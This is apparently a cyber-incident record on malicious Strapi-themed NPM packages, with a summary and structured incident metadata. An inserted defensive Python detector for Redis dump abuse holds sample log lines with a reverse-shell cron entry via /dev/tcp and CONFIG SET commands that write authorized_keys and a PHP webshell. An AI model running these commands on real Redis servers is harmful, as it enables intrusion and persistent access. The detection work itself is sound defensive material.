Supply Chain Attack Targets Strapi Ecosystem with 36 Malicious NPM Packages
A recent supply chain attack has targeted the Strapi ecosystem: threat actors published 36 malicious NPM packages across four accounts, posing as Strapi-related packages. Discovered by supply chain security firm SafeDep, the campaign delivers multiple payloads designed for Redis code execution, Docker container escape, credential harvesting, and reverse shell deployment.
The attack leverages several techniques, including:
- Redis exploitation to write crontab entries, PHP webshells, Node.js reverse shells, and SSH keys onto the host, and to exfiltrate a Guardarian API module.
- Docker container escape via overlay filesystem discovery, enabling a shell to be deployed on the host and credentials to be stolen from Elasticsearch and cryptocurrency wallets.
- Additional payloads targeting PostgreSQL databases, wallet/key files, Strapi configurations, and persistent implants.
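The Redis abuse listed above (crontab entries, webshells and SSH keys written through Redis) is the long-known pattern of repointing the RDB dump at a sensitive path and forcing a SAVE. The following detector is an added example, not SafeDep's tooling or anything from the page: it parses `redis-cli MONITOR` style lines (the sample lines below are constructed, including the attacker IP 10.0.0.9 and the paths) and raises an alert whenever a SAVE/BGSAVE lands after `dir`/`dbfilename` have been pointed at a cron directory, an `.ssh` directory, or a webshell-style filename.

```python
import os
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample of `redis-cli MONITOR` output (not real campaign data).
# Format: <timestamp> [<db> <client ip:port>] "CMD" "arg" ...
SAMPLE_MONITOR = """\
OK
1712000001.123456 [0 10.0.0.5:41230] "SET" "session:abc" "user=42"
1712000002.000001 [0 10.0.0.9:55021] "CONFIG" "SET" "dir" "/var/spool/cron/"
1712000002.000002 [0 10.0.0.9:55021] "CONFIG" "SET" "dbfilename" "root"
1712000002.000003 [0 10.0.0.9:55021] "SET" "x" "\\n\\n*/1 * * * * bash -i >& /dev/tcp/10.0.0.9/4444 0>&1\\n\\n"
1712000002.000004 [0 10.0.0.9:55021] "SAVE"
1712000003.000001 [0 10.0.0.9:55022] "CONFIG" "SET" "dir" "/root/.ssh/"
1712000003.000002 [0 10.0.0.9:55022] "CONFIG" "SET" "dbfilename" "authorized_keys"
1712000003.000003 [0 10.0.0.9:55022] "SAVE"
1712000004.000001 [0 10.0.0.9:55023] "CONFIG" "SET" "dir" "/var/www/html/"
1712000004.000002 [0 10.0.0.9:55023] "CONFIG" "SET" "dbfilename" "shell.php"
1712000004.000003 [0 10.0.0.9:55023] "BGSAVE"
1712000005.000001 [0 10.0.0.5:41230] "GET" "session:abc"
"""

MONITOR_LINE = re.compile(r'^(?P<ts>\S+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<rest>.*)$')
ARG = re.compile(r'"((?:[^"\\]|\\.)*)"')  # quoted args, honouring backslash escapes

# File sinks that turn an RDB dump into persistence or code execution.
CRON_DIRS = ("/var/spool/cron", "/etc/cron")
WEBSHELL_EXTS = (".php", ".phtml", ".jsp", ".jspx")


@dataclass(frozen=True)
class Alert:
    client: str   # connection that issued the SAVE/BGSAVE
    kind: str     # cron_persistence | ssh_key_injection | webshell_drop
    path: str     # file the dump would overwrite


def classify_sink(directory: str, filename: str) -> Optional[str]:
    """Return the abuse class for a dir/dbfilename pair, or None if benign."""
    d = directory.rstrip("/")
    if any(d.startswith(c) for c in CRON_DIRS):
        return "cron_persistence"
    if d.endswith("/.ssh") or filename == "authorized_keys":
        return "ssh_key_injection"
    if filename.lower().endswith(WEBSHELL_EXTS):
        return "webshell_drop"
    return None


def parse_monitor_line(line: str):
    """Split one MONITOR line into (client, COMMAND, args); None for non-command lines."""
    m = MONITOR_LINE.match(line)
    if not m:
        return None
    args = ARG.findall(m.group("rest"))
    if not args:
        return None
    return m.group("client"), args[0].upper(), args[1:]


def detect(monitor_text: str) -> list:
    """Replay MONITOR output and flag dumps aimed at cron, .ssh or a webroot.

    CONFIG SET is server-global, so the staged dir/dbfilename is tracked once
    for the whole server and the alert is attributed to whichever connection
    triggers the dump. The real default `dir` is the server's cwd, which MONITOR
    does not reveal, so nothing fires until a CONFIG SET has been observed.
    """
    cfg = {"dir": "", "dbfilename": "dump.rdb"}
    alerts = []
    for line in monitor_text.splitlines():
        parsed = parse_monitor_line(line)
        if parsed is None:
            continue
        client, cmd, args = parsed
        if cmd == "CONFIG" and len(args) >= 3 and args[0].upper() == "SET":
            key = args[1].lower()
            if key in cfg:
                cfg[key] = args[2]
        elif cmd in ("SAVE", "BGSAVE"):
            kind = classify_sink(cfg["dir"], cfg["dbfilename"])
            if kind is not None:
                alerts.append(Alert(client, kind, os.path.join(cfg["dir"], cfg["dbfilename"])))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_MONITOR):
        print(f"{a.kind:20s} {a.client:18s} -> {a.path}")
```

Run against the sample it reports three dumps: the cron entry for `root`, the `authorized_keys` overwrite and the `shell.php` drop. The detector is only a backstop; the fix that removes this whole class is to keep Redis off the network path the application container does not need (bind to a private interface, `protected-mode yes`), require a password, and rename or disable `CONFIG` so a client cannot move the dump file at all.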
The campaign appears tailored for Strapi users, evidenced by plugin naming conventions, targeted file paths, and environment variables linked to Strapi’s Docker images. SafeDep’s analysis suggests the attacker initially pursued aggressive methods (Redis RCE, Docker escape) before shifting to reconnaissance, credential theft, and persistent access, with a focus on Guardarian, a cryptocurrency payment gateway.
The attack primarily affects Linux systems and Strapi deployments that use Redis as a cache backend. Organizations that installed the malicious packages are at risk of credential exposure, unauthorized access, and data exfiltration.
Source: https://www.securityweek.com/guardarian-users-targeted-with-malicious-strapi-npm-packages/
Strapi cybersecurity rating report: https://www.rankiteo.com/company/strapi
Guardarian cybersecurity rating report: https://www.rankiteo.com/company/guardarian
"id": "STRGUA1775478818",
"linkid": "strapi, guardarian",
"type": "Cyber Attack",
"date": "4/2026",
"severity": "85",
"impact": "4",
"explanation": "Attack with significant impact with customers data leaks"
{'affected_entities': [{'industry': 'Technology',
'name': 'Strapi Ecosystem',
'type': 'Software Development Platform'}],
'attack_vector': 'Malicious NPM Packages',
'data_breach': {'data_exfiltration': True,
'file_types_exposed': ['PHP webshells',
'Node.js reverse shells',
'SSH keys'],
'sensitivity_of_data': 'High',
'type_of_data_compromised': ['Credentials',
'Cryptocurrency wallet/key files',
'Strapi configurations',
'Personally Identifiable '
'Information (PII)']},
'description': 'A recent supply chain attack has compromised the Strapi '
'ecosystem, with threat actors publishing 36 malicious NPM '
'packages across four accounts. The campaign delivers multiple '
'payloads designed for Redis code execution, Docker container '
'escape, credential harvesting, and reverse shell deployment. '
'The attack leverages techniques including Redis exploitation, '
'Docker container escape, and credential theft from '
'Elasticsearch and cryptocurrency wallets. The campaign '
'appears tailored for Strapi users, with a focus on '
'Guardarian, a cryptocurrency payment gateway.',
'impact': {'data_compromised': ['Credentials',
'Cryptocurrency wallet/key files',
'Strapi configurations',
'Guardarian API module'],
'operational_impact': 'Unauthorized access, data exfiltration',
'systems_affected': ['Linux systems',
'Strapi deployments using Redis as a cache '
'backend']},
'initial_access_broker': {'backdoors_established': ['PHP webshells',
'Node.js reverse shells',
'SSH keys'],
'entry_point': 'Malicious NPM Packages',
'high_value_targets': ['Guardarian API module',
'Elasticsearch',
'PostgreSQL databases']},
'motivation': ['Credential harvesting',
'Data exfiltration',
'Persistent access'],
'post_incident_analysis': {'root_causes': ['Malicious NPM packages',
'Exploitation of Redis and Docker '
'vulnerabilities']},
'references': [{'source': 'SafeDep'}],
'response': {'third_party_assistance': 'SafeDep'},
'title': 'Supply Chain Attack Targets Strapi Ecosystem with 36 Malicious NPM '
'Packages',
'type': 'Supply Chain Attack',
'vulnerability_exploited': ['Redis code execution', 'Docker container escape']}